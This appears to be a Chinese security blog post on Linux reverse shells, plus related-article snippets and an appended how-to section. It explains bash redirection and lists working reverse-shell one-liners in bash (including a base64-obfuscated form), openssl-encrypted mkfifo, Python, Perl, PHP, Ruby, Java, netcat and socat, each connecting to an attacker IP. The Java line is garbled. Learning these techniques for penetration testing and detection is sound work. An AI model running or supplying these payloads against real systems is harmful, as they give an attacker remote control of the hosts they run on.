Linux反弹shell学习

最新推荐文章于 2025-03-01 20:28:07 发布
原创 最新推荐文章于 2025-03-01 20:28:07 发布 · 1.7k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #安全

本文详细介绍了Linux系统中如何通过bash命令创建反弹shell,以及利用python等其他工具获取交互式shell的方法。同时,还讨论了如何加密shell流量以增强安全性,并列举了多种不同编程语言实现反弹shell的示例。

前言

当我们可以在远程Linux主机上执行任意命令或写入任意的数据到任意的文件的时候
通常会通过反弹一个shell 来控制远程主机

bash 反弹shell

Linux反弹shell使用这条命令,但反弹回来的shell是不可交互的
bash -i >& /dev/tcp/10.10.10.134/2333 0>&1
也可以{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjI3LzQ0NDQgMD4mMSA=}|{base64,-d}|{bash,-i}

客户端用netcat 进行接收
nc -lvvp 2333 监听2333端口
在这里插入图片描述

使用什么样的用户反弹的shell,就是当前用户的权限(只有拥有/bin/bash 的用户才能够使用该命令)

命令原理

首先 bash -i 是打开一个交互式的bash终端
/dev/tcp/ 是linux的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。

那么>&0>&1 又是什么意思呢?

首先我们了解一下Linux文件描述符和重定向。
linux shell下常用的文件描述符是:
标准输入 (stdin) :代码为 0 ,使用 < 或 <<
标准输出 (stdout):代码为 1 ,使用 > 或 >>
标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>

然后发现 >&&> 两者一个意思,都是将标准错误输出合并到标准输出中。

如果我们执行一个命令,比如 ls -lh > test ,这样的话,test文件中只会保存我们执行这个命令正常的输出结果
而如果我们执行命令 ls -lh >& test 或者 ls -lh &> test ,这样的话,test文件中既会保存我们执行这个命令正常的结果,也会保存我们执行这个命令出错了的结果。

所以,当我们执行命令:bash -i >& /dev/tcp/10.10.10.134/2333 时,他会与10.10.10.134/2333号端口建立一个socket连接,把bash的标准输出和标准错误输出发给10.10.10.134/2333。也就是获得了他的shell,但是10.10.10.134却不能进行操作。

同理0>&10<&1 也是一个意思,都是将标准输入重定向到标准输出中。所以加入 0>&1 的话,就可以接受用户的输入了。

所以,结合上面的:bash -i >& /dev/tcp/10.10.10.134/2333 0>&1 命令是意思是:与10.10.10.134/2333端口建立一个socket连接,把bash的标准输出和标准错误输出发给10.10.10.134/2333。并且可以接受输入,也就是可以进行交互式操作

但是更多时候获得的shell并不是一个具有完整的交互shell

如果目标的主机有python环境,我们在获得反弹shell后,可以执行这个命令得到一个正常可交互的shell
python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述

加密bash反弹shell

在攻击机上生成SSL证书的公钥私钥对,一路回车
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
在这里插入图片描述

然后用openssl监听反弹shell
openssl s_server -quiet -key key.pem -cert cert.pem -port 2333

目标机用openssl加密反弹shell的流量
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.10.136:4444 > /tmp/s;rm /tmp/s
在这里插入图片描述

其他反弹shell

同样是只有拥有/bin/bash的用户才能使用,使用什么样的用户反弹什么权限

Python
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.10.25”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);’

Perl
perl -e ‘use Socket;$i=“192.168.10.13”;$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

PHP
php -r ‘$sock=fsockopen(“192.168.10.13”,8888);exec("/bin/sh -i <&3>&3 2>&3");’

Ruby
ruby -rsocket -e’f=TCPSocket.open(“192.168.10.13”,8888).to_i;exec sprintf("/bin/sh -i <&%d>&%d 2>&%d",f,f,f)’

Java
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c",“exec 5<>/dev/tcp/192.168.10.13/8888;cat <&5 2=”" |="" while="" read="" line;="" do="" $line="">&5 >&5; done"] as String[]) p.waitFor()

Linux反弹shell
渗透之路,攻防之间皆学问
04-21 4581
在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。
linux反弹shell检测和溯源,Wazuh联动osquery检测linux反弹shell
weixin_39820136的博客
05-14 1325
用osquery根据制定的规则定时检测系统并生成包含查询结果的日志文件,wazuh再对这些日志文件进行解析之后匹配规则告警。osquery下载安装的过程就略过了。这里简单介绍下osquery,详细请参考官方文档文件结构/etc/osquery//usr/share/osquery/osquery.example.conf/usr/share/osquery/lenses/{*}.aug/usr/s...
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 3355
详细讲解Linux反弹shell包含的NC正向shellNC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
【讨论】反弹shell命令里的0>&1到底是个什么玩意?
DumplingY的博客
03-13 2036
关于反弹shell命令的思考(重定向你杀了我吧)
shell启动脚本中的0、1、2、>和&解析
l1394049664的博客
08-15 1万+
目录 一、0 1 2 文件描述符 二、&gt;是重定向符,就是把前面输出的内容重定向到后面指定的位置 三、&amp; 是一个描述符,如果1或2前不加&amp;,会被当成一个普通文件 nohup sh gmv.sh &gt;ls.txt 2&gt;&amp;1 &amp;  后台运行脚本的一般格式,并且把日志(正常日志和错误日志)输出到ls.txt中 tail -f ls.txt可以动态查...
Linux反弹shell命令
qq_46804551的博客
02-06 316
Linux反弹shell命令 接收端口和发送端端口要一致 bash反弹shell 接收端: nc -lvp 端口 发送端: bash -i >& /dev/tcp/接收端IP/接收端端口 0>&1 python反弹shell 接收端: nc -lvp 端口 发送端: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con
Linux常用的反弹shell命令
m0_63200360的博客
04-24 4248
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
Linux反弹Shell的多种技巧
安心写bug的博客
08-10 1469
反弹Shell(Reverse Shell)主要用来实现反向连接,突破防火墙限制、权限不足、端口限制、动态IP、内网NAT等情况,这些限制使得传统的正向连接(如SSH、Telnet等)难以实现。
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
Linux 反弹 Shell
sankgao 的博客
01-12 843
Linux 反弹 Shell
Linux环境下的shell反弹
qq_55213436的博客
07-05 2238
在日常的渗透测试中,当我们拿到一个目标网站的漏洞的时候,往往可以采用shell反弹的方式来进行下一步的操作。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。一般的shell反弹可以结合命令执行漏洞来实现。......
安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6903
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
Linux下几种反弹Shell方法的总结与理解
weixin_50464560的博客
03-31 2120
Linux下几种反弹Shell方法的总结与理解 - FreeBuf网络安全行业门户 之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。 实验环境 CentOS 6.5:192.168.0.3 kali2.0:
Linux系统下反弹shell
若有战,召必回
11-30 3528
之前研究过一段时间的反弹shell,所以本文是我个人对反弹shell的理解,当然,本人才疏学浅,如有啥错的地方,各位师傅指出,共同学习一起进步!!!0x00 定义受害者由于某种原因主动向攻击者发起连接,攻击者可向受害者下发命令并得到命令执行结果,即为反弹shell。某种原因,包括但不限于受害机器运行了远控木马(钓鱼邮件附件),存在RCE漏洞等0x01 本质网络通信+命令执行+重定向方式。
Linux反弹shell的原理
YkingH的博客
03-10 1548
Linux反弹shell的原理-bash shell是一种脚本语言,需要用解释器来解析这些脚本,常见的脚本解释器有: bash-Linux标准默认的shell sh-Unix标准默认的shell shellLinux的外壳,为用户和内核之间的交互提供了一个接口 反弹shell就是控制端监听在某TCP端口,别控端发起请求到该端口,并将其命令行的输入输出转到控制端 bash建立反弹shell bash -i >& /dev/tcp/攻击端IP/攻击端监听端口 0>&1 bash
linux反弹shell方法
weixin_53747497的博客
07-12 2574
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
反弹shell的方法总结(base64绕过等等)
热门推荐
weixin_50464560的博客
04-01 1万+
前言 什么是反弹shell(reverse shell)? 就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么需要反弹shell反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。以下详细介绍Win
Linux 反弹 Shell 方法大揭秘
m0_57836225的博客
03-01 954
在介绍具体方法之前,先简单回顾一下反弹 Shell 的概念。正向 Shell 是由攻击者主动连接目标主机,在目标主机上打开一个 Shell 会话;而反向 Shell 则是目标主机主动连接攻击者的机器,建立 Shell 会话。反向 Shell 通常更具优势,因为它可以穿越防火墙的限制,在一些网络环境下更易于实现控制。
反弹shell的各种姿势(linux与windows)
weixin_42478365的博客
06-19 1677
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。 Linux 反弹shell 姿势一:bash反弹 bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版:bash -
linux 反弹shelllinux
最新发布
06-08
### 实现反弹Shell的多种方法 在Linux系统中,可以从目标主机发起反弹Shell连接到另一台Linux设备。以下是几种常见的实现方式: #### 1. 使用 `bash` 发起反弹Shell 通过 `bash` 的 `/dev/tcp` 功能可以轻松实现反弹Shell。命令如下: ```bash bash -i >& /dev/tcp/目标IP/端口 0>&1 ``` 例如,如果目标Linux主机的IP地址为 `192.168.1.100`,端口为 `4444`,则命令为: ```bash bash -i >& /dev/tcp/192.168.1.100/4444 0>&1 ``` 这会将当前主机的Shell反弹到目标Linux主机上[^2]。 #### 2. 使用 `nc`(Netcat)实现反弹Shell `nc` 是一种强大的网络工具,可以通过它实现反弹Shell。目标主机需要监听指定端口。命令如下: ```bash nc -e /bin/bash 目标IP 端口 ``` 例如: ```bash nc -e /bin/bash 192.168.1.100 4444 ``` 需要注意的是,某些系统可能禁用了 `-e` 参数,此时可以使用以下替代方案: ```bash rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash 2>&1 | nc 目标IP 端口 > /tmp/f ``` 例如: ```bash rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash 2>&1 | nc 192.168.1.100 4444 > /tmp/f ``` 这种方式适用于无法直接使用 `-e` 参数的情况[^5]。 #### 3. 使用 `perl` 脚本实现反弹Shell Perl 脚本也可以用于实现反弹Shell。示例代码如下: ```perl use Socket; $IP = "目标IP"; $PORT = 端口; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")); connect(SOCKET, sockaddr_in($PORT, inet_aton($IP))); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); exec("/bin/bash") or exec("/bin/sh"); ``` 例如,如果目标IP为 `192.168.1.100`,端口为 `4444`,则脚本中的 `$IP` 和 `$PORT` 需要相应设置[^1]。 #### 4. 使用 `python` 实现反弹Shell Python 提供了简洁的反弹Shell实现方式。示例代码如下: ```python import socket, subprocess, os s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("目标IP", 端口)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) subprocess.call(["/bin/bash", "-i"]) ``` 例如,如果目标IP为 `192.168.1.100`,端口为 `4444`,则需要替换 `"目标IP"` 和 `端口` 的值[^3]。 #### 5. 使用 `socat` 实现反弹Shell `socat` 是一种功能强大的双向通信工具,可以用来实现反弹Shell。命令如下: ```bash socat exec:"bash -li",pty,stderr,setsid,sigint,sane tcp:目标IP:端口 ``` 例如: ```bash socat exec:"bash -li",pty,stderr,setsid,sigint,sane tcp:192.168.1.100:4444 ``` 这种方式适用于支持 `socat` 的环境[^3]。 #### 6. 使用 `exec` 和重定向实现反弹Shell 通过文件描述符和重定向,可以实现更复杂的反弹Shell。示例命令如下: ```bash exec 5<>/dev/tcp/目标IP/端口; cat <&5 | while read line; do $line 2>&5 >&5; done ``` 例如: ```bash exec 5<>/dev/tcp/192.168.1.100/4444; cat <&5 | while read line; do $line 2>&5 >&5; done ``` 这种方式适用于受限环境中[^4]。 ### 注意事项 - 在目标Linux主机上需要确保目标端口已开启监听。例如,使用以下命令监听端口: ```bash nc -nvlp 端口 ``` - 确保目标主机和攻击机之间的网络是连通的。 - 不同的Linux发行版可能对某些工具的支持程度不同,请根据实际情况选择合适的工具。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值